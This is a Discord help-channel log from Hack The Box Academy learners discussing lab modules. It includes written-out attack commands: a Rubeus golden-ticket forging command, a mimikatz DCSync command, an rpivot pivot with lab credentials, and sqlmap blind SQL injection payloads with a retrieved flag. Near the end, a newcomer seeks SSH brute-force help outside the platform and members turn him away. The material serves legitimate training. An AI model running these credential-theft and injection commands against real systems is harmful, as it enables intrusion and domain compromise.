#modules

completing CBBH, CPTS, and CDSA job role paths will not net you enough cubes to buy one Tier IV module

@acoustic owl The payload is being injected in url parameter. And it changing thing in body of the html

at least one. i had around 500 after cpts

Tier IV modules cost 1000 cubes

do solutions from one lab to another transfer over in the same module? eg. I'm currently doing the footprinting hard lab... i found some credentials in the medium lab, should I try them inside my hard lab?

Exactly. So you have to find a way to make your code valid.

But this code is valid see once

yeah, but if you add them up it will net 1000

i just added up the cube rewards of each module in all the paths and the total does not amount to 1000.

Not when you inject it
You cannot open another tag within a tag parameter

oh

how much?

it could be that i'm calculating it wrong, but i checked twice and it's not enough

you should have 840 cubes after completing all three paths

Means writing <script> tag is wrong

This is not valid html

<tag param=“<tag2>blah</tag2>”></tag>

Hey, I'm having a bit of troubles with Password Attacks - Credential Hunting in Windows

Question: What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)

I used ||Lazagne.exe|| and got a credential, I put it into the answer box and it says it's incorrect, and it is in the right format as well...

What addressing mechanism is used at the Link Layer of the TCP/IP model?

Okay got it

Try not to post spoilers dude. Did you ensure no whitespace?

You don't need to use alert

is this for a module? don’t outright ask for answers for questions.

this would easily be answered with a quick google search. 🙂

or just in the course material tbh

And don't share your payload as it can be a spoiler

IS NOT MAC AND IS NOT ARP DONT THINK IM STUPID

i don’t think you’re stupid. relax

maybe you’re formatting the answer incorrectly

But Payload's point is; look where your payload is getting injected

You need to escape that first

Question. I’m new here. Are we able to go from knowing basically nothing to being relatively proficient using hack the box?

yeah i did

try different variations of how you can answer that question. you’re on the right track with one of those.

yes. begin with fundamentals and work your way up from there.

Please stop sharing your payload @copper fox as it can be a spoiler, you're close but not quite there. Why would you use alert? Also look at the source code of the page you're testing on

If you're not testing, you should be able to test it on the /phishing/index.php iirc

It's the payload mentioned in course

do you guys also have this issue with black screen of rdp?

And the course isn't tier 0

Press enter

oh thanks

I did, but not receiving desired output

Then your payload is incorrect :)

Again

View the page source

sorry for being rude

Look where your payload is being thrown into

all good 🤷‍♂️ it happens

the answer just needs a cipher between the words

I copied and did as mentioned in the course. You can check the payload in XSS phishing section. The payload used to remove url bar

glad ya got it

To inject code you need several things

The <script></script> tags

Did that too

And of course a place for the payload to actually run

Did you view the page source

yea

To see how you might be able to get out of the tag you're thrown into?

should I share?

You must first escape the html tag you're thrown into

okay

then your payload can detonate

But also

alert isn't doing what you think it's doing

Alert pops a message up on the screen

yea but it's not doing

sigh

If you're trying to phish someone, why would you have an alert pop up?

You can do this without alert

The module requires knowledge of HTML, CSS and JavaScript. You can't just copy and paste anything anywhere. That will not work

ok

Okay

Nowhere in the phishing section mentions alert()

right, sorry my bad

Anyway

Start from the beginning

Just get any payload to work

Also, as a note, the section gets you 90% of the way there the other 10% is using knowledge from previous sections to actually get it to work

Okay, why I'm feeling you guys are scolding me 😅

In which modules will these be covered in-depth?

I see it a lot, if not in Attacking and Enumerating AD then where should it be? =D

From here https://academy.hackthebox.com/module/143/section/1276

No one scolds you

That's just how you're interpreting it

We try to push you onto the right track

I'm really taking notes, not just putting random payloads. Thank you guys

no no

maybe something with this

but im not sure how much its covered here

So not CPTS?

no

Phew

@acoustic owl man it worked thanks alot again

I read the source page carefully and found a flaw in that

Guys I'm in pentester path, information gathering-web edition, skills assessment. I think I have a problem with the box period. I could only solve the first two questions which were very basic, I tried brute forcing directories and sub domains with different wordlists and nothing shows up, i tried crawling with scrapy and the .json file is always empty. Idk what the hell im supposed to do. I bruteforced the vhost and found a few status 400 names but I can't find them on the browser but gobuster decided to show them to me

Well 400 isn't going to exist

Subdomains are the way to go. Top 1million lists are useful

Would you need to pay to be able to do that, or is the free version enough?

@lean crane it looks like some of the fundamentals are under the Tier1 which isn't free I believe

The information Security Foundations path (and all tier 0 modules) will give you the cubes you spend back

The box says "vhosts needed for these questions: inlanefreight.htb" should I look ONLY for inlanefreight.htb? Because I also used a crawler for that and it seems like it's just empty, both brute forcings and crawlers don't give results

I tried subdomains already

No inlanefreight.htb is just the starting point

There are subdomains

You may need to adjust your filter

Filter?

...yes filtering results

Thanks for the info

You'll need to filter the results you get with ffuf to toss junk results

my terminal is freezing, anyone know why? i am on the information security foundations, linux fundamentals, i have connected to the htb-student machine using my own terminal but it keeps freezing up

You can either manually set it or use -ac to have ffuf determine automatically

This usually means your connection isn't stable

There's no results if I do "gobuster DNS -d inlanefreight.htb -w subdomains-top1million-110000.txt"

Because dns isn't running

as in my internet is bad or the machine is overloaded? because everything seems fine when i browse the internet using my browser

You'll need to do vhost fuzzing

"Value 'tun0' is not valid for option 'LHOST'." whys my metasploit saying this?

if i’m not mistaken, fundamental modules are Tier 0 and are free.

Try changing vpn regions and reconnect

Not all, it depends on the topic

i stand corrected then 🙂

Some of the intro to x modules are not tier0 but are fundamental

best to just explore what’s available on https://academy.hackthebox.com

"gobuster vhosts -u http://inlanefreight.htb:1234 -w hostnames.txt"?

Well it sounds like you don't have a tun0 interface

--append-domain

how do i get one/fix it

do you have your vpn connected>

Well on academy, there's a handy button to download it

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

ohh its cuz my vpn thingy wasnt connecting so i tried doing it without

do i have to connect everytime i start my vm?

yes

if you want to interact with the targets

like download a new file and all? or reuse the same one

ive been reusing, I think you only redownload if switching servers

can i close the console after connecting or keep it open

..that im not sure, I minimize mine.

You have to keep it open after it connects

When you close it, it stops the process running the openvpn connection

Thanks

I'm trying to complete the Skill Assessment for Using Web Proxies and I'm having some trouble with the final question

i was corrected on this if you didn’t see.

some are free, some are not.

just check what’s available at https://academy.hackthebox.com

I'm setting the PROXIES option within msfconsole to 127.0.0.1:8080, but Burpsuite isn't intercepting it

So it found one domain but it doesn't load even with curl command. How can a DNS server not run if a website is supposed to have subdomains?

add to hosts file

You need to add it to your hosts file

You need to specify type

HTTP:127.0.0.1:8080

Ohhhhhhh

If it were a socks proxy you'd do socks:ip:port... and so on

why do i keep getting the command "Msf::OptionValidateError The following options failed to validate: RHOSTS"

How did gobuster find it if my VM can't load the page without that specific subdomain being on etc/hosts?

It manipulates the host header

What does your RHOST look like?

83.136.255.40:47016

You specify the port separately

Also you can't get a reverse shell on public hosts

im trynna do the ip that the module gave me

so i do set RHOSTS 83.136.255.40 only?

So if your exploit is a reverse shell of some kind, it's the wrong exploit

With gobuster add --append-domain

anyone have a fix for bloodhound data just stuck uploading forever?

@fathom pendant what magic do you know about this

Regrab the data

Likely it got corrupted

tried that, happens with almost every single machine i do it on

it works flawlessly with the python version but i cant use it in this case

like theres a 95% chance the data will not work

I've not had many issues with data grabbed from the sharp hound on the ad enum boxes

So basically when I am trying to find subdomains of a vhosts you shouldn't use DNS flag in gobuster but vhost and --append-domain right?

Generally yes but it depends

dns flag relies on dns servers to resolve

I.e. directly trying subdomain.example.com

Instead of host header manipulation

Where it asks the server you're attacking directly

Hey does the host subdomain.example.com exist specifically on this host?

dns uses public dns servers
vhost uses the site itself you're targeting

small question, i just finished the footprinting hard lab, and i think a little by chance. how should i have known that particular services were running on the device? was it correct of me to just guess ps -aux | grep service-name based on the files of the user i found?

I believe the one you're talking about explicitly mentions the service is running

In one of the things you may have read

it doesn't, the leading text is :

The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to access.

Key words that stand out to me;
backup, MX, management

Generally if something is a backup of internal accounts there may just be a database running

i see, but it could have been any kind of database, not ?

This is where the assumption can come into play. What databases were you taught, and what's most likely from the module

i see. i wasn't that far off then in that case!

thank you Marcielee 🙂

But go over all discovered information. Even a seemingly random txt file could key you in

Also

always scan the targets that are 10.129.x.x

Don't assume htb is giving you all the information

Just enough to get started

But assuming things in the enumeration phase can lead to needing to re-enumerate your baseline later

scanning 10.129.x.x didn't reveal the above ^

at least for me, maybe my scan was off

Well if a service is only running internally, it may not reveal anything

If you're curious as well about running services, netstat is a useful command

Instead of just ps aux which gives process info

guys, when i run a command that takes a lot of time to execute, is there a way to cancel it?

control C

Ctrl - c
Cancel this shit bc I think I fucked up with how long it's taking

basically

im trying to find the email of the user

story of my life.

and im greping all around, cant find it still

As a note, not everything in this field is instant gratification

Sometimes you do have to wait upwards of 30+ minutes for a command to work

thanks for the info, but right now im in a period of thinking "is this command supposed to take this long to execute or have i written something very stupid that made my terminal freeze"

i guess it comes with the experience

What module and section

linux fundamentals, system information

i have a task to find the email of the user

Ah

This question is actually really easy

Look through the listed commands and see what each do

One of them will give you a useful bit of info about of a lot of things about your environment

Also as a note, the filepath doesn't need to exist to be assigned

thanks, ill try to find it, i have been going trough various file directories trying to find it

Let the os work for you

Also if it wasn't clear, this was a veiled hint

alright that was easy, the thing is that i have already found a path earlier but i forgot to include the user name in the file path

thanks 👍

The username is part of the path. It'd be specifically a directory in the base path for the user 😉

that's basically this?

the 'root' confused me, why isn't there my user name?

Because that directory doesn't exist

As said

A directory doesn't need to exist for it to be assigned to a path

Alongside that, this is done on purpose

It is to have you go through other enumeration commands

Hey guys. I wondered if anyone could give me a hint about that last question of the dacl attack II skill asessment, i Got every users. the hint isn't really helping. Thx!

In CBBH Module Need Help

I need help with Broken Authentication - Skills Assessment. I have bruteforced a user and password. I cant brute OTP and read it is not the way. I can't figure out how to bypass, i have tried registering a user and seeing the difference but still no clue. Can anyone help.

so if it doesn't exist, how can it be used? I'm sorry if this is a really noob question im new to all this

Oh it 100% would likely break, or be created when it's first needed

But you can assign any value to a variable

Doesn't make it correct

huh

am I confused

what does that mean

You can assign MAIL=/nonexistent/directory

so as i understand it a path i a bit different term from actual current file directory as in that it will be generated when needed even though it currently does not exist? and all of that is stored in the env directory?

env isn't a directory

never mind, figured it out

sry, a command

They are assigned variables that depend on context and program utilizing them

Like how LS_COLORS dictates the colors of the different file extensions

thats cool, i think i get it

i had that problem because my godpotato-net4.exe was 0 bytes. firefox didn’t fully download it because it thought it was harmful.

please how do i spanwn up the htb vpn on my kali machine ?

i have downloaded it already i worked with it yesterday , but can not ssh into target machine today

sudo openvpn /path/to/file.ovpn

Hello again I'm using chatgpt for some part of the explanations in the modules am I valid or no?

Is anyone else doing what I am doing?

sure, but I'd also take notes

thanks

yea i am currently doing that as well. I have seen alot of other peoples notes its just a list of commands usually. I have been writing notes and points I am not sure if the way I am doing is appropriate or no

if you didn't know, you don't need to re-download it every time. you can just re-use the same file. i'd suggest putting the openvpn command down in your notes. also, protip, if you use & at the end of your command it'll drop it into the background and you can close the terminal. sudo openvpn /path/to/file.ovpn & like that

if u know how, u can also make an alias to run it a bit easier

i use: sudo openvpn --config /path/to/file.ovpn

is easy just editing .bashrc

Ik

nano ~/.bashrc

I use “acad” to run the academy vpn

and add this line: alias alias_name='command'

nice!

i use htb

.zsh on kali

Got that for the labs

There is a footprinting module, oracle tns section. Where section provide a bash script. But it's not running as it is supposed to. I addressed this matter earlier as well.

@fathom pendant could you help with this?

Here

what exactly is your question

you don't really provide any info so kinda hard to help

"it doesn't work" isn't a good description

there's a stack trace after the linked message, either make a python venv or install odat via apt

can someone help me with an AD fundamental?

The module https://academy.hackthebox.com/module/74/section/1350

Describes a NTLMv2 Challenge/Response example and i cant seem to decipher what is meant by SC/CC (server->client? client->client? dont think thats right)

SC = 8-byte server challenge, random
CC = 8-byte client challenge, random
CC* = (X, time, CC2, domain name)
v2-Hash = HMAC-MD5(NT-Hash, user name, domain name)
LMv2 = HMAC-MD5(v2-Hash, SC, CC)
NTv2 = HMAC-MD5(v2-Hash, SC, CC*)
response = LMv2 | CC | NTv2 | CC*

edit: nvm the SC stands for Server Challenge and CC for Client Challenge, respectively.

If i make python virtual environment, will the tool odat.py will work smoothly?
I did. But odat.py was not able to run.

I did. Follow up from my here reply.

I'm not able to properly execute the bash script provided in the Oracle Tns section (to setup odat). But pip3 packages are not installable, gives error (need to create virtual environment etc, you can see more in detail in the follow up above message i provided when asking question)

are you using pyenv or venv? you should be using venv i think pyenv is deprecated

this tripped me up as a returning python user a few months back as well

@grand portal ^

also make sure your venv is set to path, the venv autoconfig wizard should check this and alert you

added to path* but you know what im sayin

I'm using venv. But that bash script is not working, someone should update it. I don't get why that is working on pwnbox? I tried re-installing vm on my local, still not working. Anyway, i hope you're doing fine.

yeah im doing alright, any relevant terminal output with cmd?

I'm trying to use pipx instead of pip3 from the bash script. Pipx is used to isolate python environment and it's used to install commandline tools. That we want. So I'll keep posted here. If it works as i hope.

ok so yeah dont do that, or atleast the REALLY NICE folks over at #python on libera told me not to. pipx defaults to the system install of python, you need to setup your venv then use pip from your newly created environment

do which pip3 to make sure its defaulting to your venv

i ran into a very similar issue

let me see if i can get you some terminal output to help guide you

Is that a problem? It makes scripts like mssqlclient.py availabe systemwide on any terminal. I don't see pip3 doing that. I'd have to manually enable virtual environment?

Alright. Brb

venv pip3 wont make it global but do you /need/ that?

I don't nedd that really. But i want to run pythons scripts systemwide. Using pip3, will i be able to run msssqlclient.py from any terminal? Did you try?

Bash script result from the Oracle Tns section. i know which commands are giving those errors :

1. pip3 install cx_Oracle
2. sudo pip3 install colorlog termcolor passlib python-libnmap
3. pip3 install pycryptodome

you can and probably should use projects designed for terminal use like impacket/netexec with pipx, basically use the documented way to install. for more complex projects line odat you'll want to create a venv. but again odat is available in apt

I don't understand the pip3 and virtual environment. If pip3 is responsible for installing packages virtually, so the installed packages can't be accessed outside the virtualization, right? I don't get why they provided that bash script, it needs changes. Or maybe my system is not setup to run it. Because pwnbox ran it without issues.

pip3 installs packages depending on if it's inside a venv or not

if the script works for pwnbox then it works, they can't account for the difference in every system

hey guys

for skill assessment 1 of common application i founded the vulnerability i can list the directory /Desktop but unable to use type to read the flag and there is no access.cgi file to try to have a reverse shell

I'm using the hackthebox edition parrot os locally. Shouldn't this be same as pwnbox?

no

parrot os is maintained by parrot, there is htb people maintaining pwnbox

alright

what is this ?

that's pwnbox, says it right there

so the download button is for parrot os not the pwnbox?

yes

https://help.hackthebox.com/en/articles/5185608-introduction-to-pwnbox

that's bad, i can't customise my vm as i go through the process. wish there was pwnbox downlaod. guess it's proprietary.

wdym you can't customise your vm? it's your own vm, do wahtever you want with it

it gets reset everytime i log out, does not it?

what? whatever you do in your vm stays, it's pwnbox that gets reset

Hi everyone, I am doing "Stored XSS" section of "Cross Site Scripting" module https://academy.hackthebox.com/module/103/section/967, and I completed the question. But I do not understand how is it "stealing" cookie? The malicious XSS payload that we add to get the cookie is stored in the database? Sure. But when another user views the same task and the code gets executed, it is executed in the context of that user itself. This means, each user will see their own cookie, which is not bad. So, how does it allow me to view other user's cookies?

Hello, I'm doing the Broken Authentication Skill Assessment. I got through the Login and when I got stuck when submitting 2FA it redirect me to login instead.

Example you using Burp collaborator or using Webhook, you modify your payload and let it sending the cookie to you, sorry my explaination is bad

Wait till you reach Session Hijacking section

The section you just did just asks you to execute JS to show yourself the cookie. There isn't any cookie stealing techniques being taught in there

ofcourse i can customise my own vm. but pwnbox locally as vm would have been blessing. anyway parrot is just fine as well, just gotta make changes once in a while

pwnbox is parrot

if you want to configure it you can do it via ansible - https://www.youtube.com/watch?v=2y68gluYTcc

Anyone To answer

the interface of parrot os website has changed a bit, im a bit confused how to download exact the pwnbox vm. can you see the link?

you can navigate it is not that hard

Gotcha. However interface has gotten wierd.

¯_(ツ)_/¯

There's no download specific for the pwnbox vm

actually, i think there is.

The HTB-edition is close but it isn't exact

I see. still better than other editions.

Not really lmao

how so? im using security edition so far.

Htb-edition is just security edition with a trench coat

what, really? i thought i would not have to manually install many tools. just a offline pwnbox

You'll still have to install tools

Even the pwnbox you need to install tools

The advantage to using your own vm is:
You aren't relying on a third party for your vm, so you always have access to it
Persistence, tools you install remain installed
Version control, you have more control over the version of tools you install

Thanks, that's been helpful. I've been using security edition so far. gonna continue using it.

Hello everyone!
I enrolled in the SoC analyst path and I am stuck at the module "Cyber kill chain" at the question "in which stage of the cyber kill chain is malware developed?". I try the answer "weaponize" but I get an error and incorrect answer.
Why is this happening? I believe that this is the correct answer.

anyone felt like the skills assessment in Security Monitoring & SIEM Fundamentals isnt quite on point ? I mean whats the difference between escalating to tier 2/3 or consulting the IT admins ?

watch out for capitalization or trailing whitespaces

Thanks! 🙏

Attacking Domain Trusts - Child -> Parent Trusts - from Windows
Performing a DCSync Attack

Can someone tell if I'm doing something wrong?

Ticket is cached and PS running as administrator..

Can you explain what have you done until this point ? I suspect it may be an error associated with the version of mimikatz ... You can google the error shown on the last line and try an oder version

The mimikatz on the targets should be fine

The ticket caching thing can be finicky

I remember fighting this for a bit to get it working

Hi ! if i have some questions about Practical Digital Forensics Scenario, it's in #1234357888114364508 ?

I need some help about a question inside the module

you can ask your question here

dont ask to ask. just ask

I did the following

Creating a Golden Ticket using Rubeus
PS C:\htb> .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

Confirming the Ticket is in Memory Using klist
PS C:\htb> klist

Performing a DCSync Attack
PS C:\Tools\mimikatz\x64> .\mimikatz.exe
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm

#1234357888114364508 is for reporting errors

ooooh okay thanks !

which module is it?

Attacking and Enumerating Active Directory https://academy.hackthebox.com/module/143/section/1457#:~:text=Domain Admin user.-,Performing a DCSync Attack,-Attacking Domain Trusts

Your steps seem fine ... However try to add the domain in your command see if it works : lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL

Introduction to Digital Forensics

Practical Digital Forensics Scenario

Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744.
I find the answer with some luck but i don't understand the process to find it legit. To avoid spoil here we can go mp

i see. have not completed this module.

same happened with me, but somebody once told me, there is no luck in such cases, you just discovered one of many methods to reach to the answer.

Maybe I should've just read a bit further..

No its just luck here, i found the powersploit github and try 2 tools

but i very need to understand the path

You found powersploit, you then match what the process did to what powersploit module does the thing

yes but i dont understand what the process did even after decode twice the base64 strings

i found the endoded strings with the command line of the process, i decode once, twice and then i don't know where to search haha

Stuck here, ||SharpHound|| is very slow

Modern Web Exploitation Techniques > Skills Assessment

Heys guys
Stuck on getting the password for "htb-stdnt" and "admin" users, any hint or nudge on the right direction would be really appreciated. Been stuck on this for a couple of days now and I'm not sure what I'm missing.

• ||Sqli via websockets from library endpoint|| doesn't reveal any password in database
• Tried ||sql on|| vault endpoint
• Tried ||password brute force on|| vault endpoint
• Tried ||command injection||
• Tried ||directory brute force||
• Tried to ||access vault.php, profile.php, config.php, db.php after an incorrect login attempt without following redirection, to check if session was temporarily valid||
  Feel like there's nothing else to work with here

Thanks

I believe everything in module

just read it again

What exactly should I read again? The module is about dns rebinding, second-order vulnerabilities, and websockets. I would probably be able to exploit this endpoint using ||websockets ||if there was some way to interact with another user, which isn't the case here. Can't find any second-order vulnerability, and dns rebinding isn't possible without pointing the victims dns configuration to my dns server. No doubt it's some simple detail I missed, but it's been a couple of days and I would really appreciate any concrete tip in the right direction.

it shouldn't take too long, just a bit more than the default timeout

Started one hour ago with default collection method, still waiting

Hi guys, I am doing the Windows Fundamentals Module, I have a problem in terms of connecting to the target, I am also not able to ping it. This has been the first time it happened, I have done the CBBH path without this problem and boxes from the app. Any insights?

And also even the Pwnbox is not able to connect to the target host.

hello could someone help me im new around here and i cant type in general

Read #welcome and #rules

i already did

because i had wait 10 minutes before typing so i just read that

Did you verify your htb account using /verify in #bot-commands

oh no

Try that maybe

was anyone able to do this section or not? https://academy.hackthebox.com/module/113/section/1097

Module Tunneling and port forwarding" Good morning colleagues, I'm stuck on the next question. Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer. I am trying to access the external web server in the following way and I have already configured tunneling as the module says but I do not have access python2.7 rpivot/client.py --server-ip 0.0.0.0 --server-port 8080 --ntlm-proxy-ip 172.16.5.129 --ntlm-proxy-port 8081 --domain inlanefreight --username victor --password pass@123

Due to the many CPTS certificates and the fact that the completion of this module is a prerequisite for being admitted to CPTS, I assume that some have completed this module. So the answer to your question is clearly yes 😉

no but i misunderstood lol i asked a question about skill assessement 1

just here

is it normal for type not to work?

Do you have read permission for the file?

yes its normal , alot of commands may not work through cgi even if you specify the full path ... So you'll have to dig deeper to see what works ... Try to get a reverse shell also because its possible

https://lolbas-project.github.io can be useful

ok I understand thank you

no, I don't think so, since he doesn't do it.

Can you help me

Not unless you ask your question

https://dontasktoask.com

With what exactly do you have no access?

I dont have acces to the externas server to see the flag

You need to set up the pivot on the internal machine (10.129.x.x) to pivot through

Hello, I really need help getting my head around a question in the CBBH: MySQLMap Module

In the first question in the Attack tuning section, it asks for a flag that can be obtained through an (OR) SQLi vulnerability...
I tried doing it manually but no success.. so I fired up sqlmap and managed to obtain the flag...

Anyways, I managed to get the flag but I don't understand how sqlmap retrieved this data...I turned on the verbosity to the max and enabled debugging and traced all the HTTP requests that sqlmap made
and managed to find the query payload that SQLmap used to retrieve the flag (it's in the screenshot below)...however when I try using the same payload manually in the browser I get no results whatsoever...

What am I missing here...why can't I replicate manually it someone help I'm losing my mind lol

This is the part of the HTTP request history that shows the payload that SQLmap used successfully to retrieve the flag from the 'flag5' table in the 'testdb database:

[07:34:51] [TRAFFIC IN] HTTP response [#544] (200 OK):
Date: Tue, 27 Aug 2024 11:34:50 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2473
Connection: close
Content-Type: text/html; charset=UTF-8
URI: http://94.237.48.203:38759/case5.php?id=-2723 OR ORD(MID((SELECT content FROM testdb.flag5 ORDER BY id LIMIT 0%2C1)%2C31%2C1))>124
[07:34:51] [INFO] retrieved:** HTB{700_much_r15k_bu7_w0r7h_17}**
[07:34:51] [DEBUG] performed 228 queries in 14.08 seconds
[07:34:51] [INFO] retrieving the length of query output
[07:34:51]** [PAYLOAD] -8722 OR ORD(MID((SELECT CHAR_LENGTH(id) FROM testdb.flag5 ORDER BY id LIMIT 0,1),1,1))>51**
[07:34:51] [TRAFFIC OUT] HTTP request [#545]:
GET /case5.php?id=-8722%20OR%20ORD%28MID%28%28SELECT%20CHAR_LENGTH%28id%29%20FROM%20testdb.flag5%20ORDER%20BY%20id%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E51 HTTP/1.1
Cache-Control: no-cache
User-Agent: sqlmap/1.8.7#stable (https://sqlmap.org)
Referer: http://94.237.48.203:38759/case5.php
Host: 94.237.48.203:38759
Accept: /
Accept-Encoding: gzip,deflate
Connection: close

my initial assumption is that this is a blind vulnerability

based on that fact that it sent 228 queries

what is the full description of the SQL vulnerability

it should say something like```

Parameter: test (GET)
Type: time-based blind
Title: OR time-based blind - X or Y clause
Payload: test=dfSf' OR ...

Same thoughts as @ember fern

Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://94.237.59.63:38407/case5.php?id=-6195 OR 1585=1585
Vector: OR [INFERENCE]

If you're thinking that using the payload in browser is going to give you the flag in one request, it won't.
Blind based attack works by have a integral script in sqlmap that automates the process of extracting data with a lot of requests one by one.

Based on a true or false condition

Aha I see...so the part in the http request history which said "information received: HTB{.........}" was a result of multiple payloads and requests and not attributed just to the payload and request that was mentioned right above it...correct?

Correct

Yeah makes sensee now... thanks a lottt @misty current @ember fern

That does not sound right, it definitely did not take that long for me

yeah so it's basically running a binary search to extract the flag via boolean-based blind

it's automated

(and a little magic)

Does anyone know if we can run Responder from our attacker machine through a pivot tunnel made with Ligolo?
Or do I need to run responder from a machine within the internal network since it won't work through pivoting

LLMNR works by sending a multicast packet on the network segment at 224.0.0.252:5355, so it needs to be run from the compromised machine in the internal network.

There may be some network fuckery you can do by configuring a reverse port forward for 224.0.0.252:5355 on the internal machine to send traffic back to the attacker machine and run responder on the attacker to catch it like that, though I have not tried it.

Hello I can ask anyone about advanced deserialization attack module, skills assessments .

?

Just ask your question

for the blacklisted keyword on skills assessement I doubt its possible to execute command without System.Diagnostics.Process

Any one completed "ADVANCED XSS AND CSRF EXPLOITATION" section "XSS Filter Bypasses"?
I managed to bypass using <object> or <iframe> payload but cant trigger admin page

Is this the support channel for general HTBA login issues?

I have an issue loging into HTBA. My accounts are linked and I am using the correct password, but when trying to login to HTBA it says These credentials do not match our records. If you have an HTB Account, please proceed connecting through your HTB Account. This is even after I am already logged in within that browser but it pulled up a new page. It's a very kludgy interface.

No

Where is it?

Reach out to support via the green bubble on the website

I was able to find the flag but I have a lot of questions x) for skill assessement 1 of Common Application

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

You need to log in via the HTB account option

https://account.hackthebox.com

Try logging in there

Getting to support is also kludgy 👍

Try logging in via HTB account

Where is the green bubble?

Everything is green

Bottom right of the page

If you don't see it you likely have adblock enabled

for my understanding I would like to know if the creator of the challenge has filtered the command type during the execution command found in the /cgi directory. If it's filtered, shouldn't we be able to access the command from our reverse shell? If so, I'd like to know why.

I don't see and I do have ad block enabled. Very odd that they implemented it in this way. Thanks!

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

It's a pain in the ass

Getting to support? Seems to be

It's because intercomcdn (for some reason) is blocked by adblockers

ok so don't understand lol just say it works

Basically

Yeah

I just threw msfconsole at it and said screw it lmao

or you can see the module's creator. I'd love to ask him 🙂 because it tortures me to know that I can list the desktop content on the url but not read the directory content with type cmd

nudge appreciated, anyone?

Still need help with that?

yes

Finished it a while back but don't remember that well, gimme a min to spin up my vm

Hey man sorry for the wait, dm me.

ok

Does anyone know how to XML Filter Event Viewer? I'm trying to filter my events for unsigned events.

Finally its OK for advanced serialization attack. Done

Question within the Widows Lateral Movement RDP Section. The question I'm stuck on is:

"Use NetExec to conduct an RDP Password Spray using the hash 'A35289033D176ABAAF6BEAA0AA681400'. Which user successfully authenticated?"

1. I have tried cracking the hash to no avail and I have attempted to use Netexec with the '-p' switch which has not been able to authenticate. I'm a bit confused because:

2. Netexec doesn't explicitly state in it's documentation it supports pass the hash so I'm not sure what the switch would be to attempt it

The first target host "SRV01" does not have RestrictedAdmin Mode enabled, nor does it have the corresponding registry at all. I was able to use powershell and determine 'SRV02' does have it, but the question doesn't state to spray to that? I'm just a bit lost

I suppose maybe when I used Get-AD I didn't pull enough of the right users? Or again, not sure if the question wants me to crack the hash (I've gotten weird results with Hashcat), or if it just wants me to realize that SRV02 has RestrictedAdmin and to try there. Additionally the first account you discover on the first target machine does not have admin perms, so can't create the related registry

As far as I'm aware, the registry key is DisableRestrictedAdmin and it looks like your interpretation of the situation may be backwards.

Still it’s not enabled

Or rather, not there at all

But I don’t even think that is the main issue here. The main issue is nowhere within netexec documentation does it outline support for “spraying” with hashes.

Anyone can give a nudge on the "Whitebox Attacks" Module - Section Client-Side Prototype Pollution?

I found the GET parameter needed for the elevating my privileges, got a valid payload to send a HTTP GET Request tested to my Server, but when I send to the admin via input form, I still can't get access.
Tried via $.get and fetch.

Good god. Finally.
That was fun, but lots of unfamiliar territory to work with 🙂
https://academy.hackthebox.com/achievement/698577/112

"1. Netexec doesn't explicitly state in it's documentation it supports pass the hash so I'm not sure what the switch would be to attempt it"

You can use "--help" and see what flag is needed to use NTLM hash authentication instead of password auth.

You don't "spray" with hashes

That is the wording in the module not mine

Good point!

I believe the netexec hash flag is -h or -pth

¯_(ツ)_/¯

It will iterate over a username wordlist with a NTLM hash, so it's pretty much alike

That's fair

-H flag

I was thinking from the perspective of having obtained the hash yourself via dumps

Where you'd have the corresponding username

That module dragged by the end and I have plenty of prior experience with most of the services covered. 😅

it goes without saying that i learned a lot which is good

and which is why it took me like a week total to get through.

Can somebody help me with Attacking DNS (Attacking Common Services) ? I actually found the flag, but I don't understand something.

||subbrute inlanefreight.htb -r ./resolvers.txt||

subbrute is working

but if I try the same with dnsrecon, it says ,,Could not resolve domain: inlanefreight.htb"

||dnsrecon -d inlanefreight.htb -n 10.129.203.6||

Can somebody help me to solve an error arising while using hydra (brute force password cracking tool) :- "cannot connect to ssh"

Have you set the correct port?

Means

I tried literally everything!!

Can you recommend some command to correct it

What’s your command

Wait le me send my screen capture

Did u use the -s flag for port?

Just the command and output please

Exactly my thought

Bru

What??

Are you connected to the vpn?

Wanna hack me 💀

😭

No

No actually I was learning with some random Russians

And stuck there though the example i took is from internet

Hey can you help me

What module are u even on?

Basically I m newbie

So you cannot expect much from me

Are u on the htb website?

But the team I am working with is international (Russian,Dutch etc.)

Yaaa bud

Help me !!

What room bro

Sorry bud i cannot

😵

If you can’t state the module and section you’re on, we can’t help

Are you referring from htb ??

Then do so

Like you ask my htb module

Name the module and section you’re working on.

I am confused (what are you asking for I m just learning (though I am self confused too))

I m just working on brute force

Where did you get that IP?

It's for practice

I have many more (cuz of Russian friends)

Wait, why did u choose a single name and a password for hydra

Nmap

can you link the website from where you are learning brother?

?

Sorry bud !! I m not learning from any website

this discord and channel is for a specific website

Im certain no one can help you with what you are asking

It's a practice example given on web

Then we can’t help you. This place is for hack the box and not just random hacking

Can you tell me some other server where hackers are ??

No

no

Plsss brother !!

It’s a private ip address and ur not on the vpn bro

No.

Shitttttt

And u def don’t have a container up 😭

Thanks le Mee activate my vpn 😂(fuckkkkk how I am supposed to do this))

he already made it clear he isnt learning from htb

Where did u even get that ip😭

im certain he won't know about the dockers

Yaaa I m not

from his russian friends

We can’t help you further buddy. Ask your friends.

Cause htb or any other resources posses a constraints. But random learning not have limits

Ok thank you for your time buddy

People still try
I get it why you guys get pissed sometimes

honestly the mods and community contributors have a lot of patience

Actually I m not even there 1% they are not hackers they are Russian hackers. And I have fear of getting hack still I m learning from them but still fear is fear

U don’t even know how to connect to the ip yet bro

Anyway

anyone facing issues with RDP ?

